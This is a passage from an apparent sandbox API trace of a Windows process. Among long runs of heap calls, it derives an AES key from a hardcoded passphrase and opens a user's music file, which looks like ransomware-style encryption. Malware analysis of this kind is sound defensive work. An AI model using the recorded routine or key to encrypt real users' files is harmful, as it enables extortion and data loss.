out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.413] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.413] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0117.414] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7710 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9bf0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0117.416] CloseHandle (hObject=0x258) returned 1 [0117.416] FreeLibrary (hLibModule=0x772d0000) returned 1 [0117.416] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0117.416] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b87d480, ftCreationTime.dwHighDateTime=0x1d5e0cf, ftLastAccessTime.dwLowDateTime=0xf027b580, ftLastAccessTime.dwHighDateTime=0x1d5e63f, ftLastWriteTime.dwLowDateTime=0xf027b580, ftLastWriteTime.dwHighDateTime=0x1d5e63f, nFileSizeHigh=0x0, nFileSizeLow=0x11773, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="ymTK.m4a", cAlternateFileName="")) returned 0x41ac600 [0117.416] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0117.416] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0117.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0117.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0117.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0117.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0117.417] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a49d0) returned 1 [0117.418] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0117.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.418] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0117.418] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.418] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cae50, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0117.418] CryptCreateHash (in: hProv=0x41a49d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0117.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.418] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0117.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0117.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0117.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.418] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb078, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0117.419] CryptHashData (hHash=0x41ac740, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0117.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.419] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0117.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caf58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0117.419] CryptDeriveKey (in: hProv=0x41a49d0, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac000) returned 1 [0117.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0117.419] CryptDestroyHash (hHash=0x41ac740) returned 1 [0117.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0117.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0117.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0117.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0117.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0117.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02b0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0117.420] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0117.420] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0117.420] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0117.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0117.421] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\A-LWlY-3UKn4PQ_Otnq\\ymTK.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\a-lwly-3ukn4pq_otnq\\ymtk.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0117.421] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.421] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0117.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0117.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.421] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0117.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0117.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0117.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0117.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0117.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0117.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0117.422] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0117.422] HeapFree (in: hHeap=0x1780000, 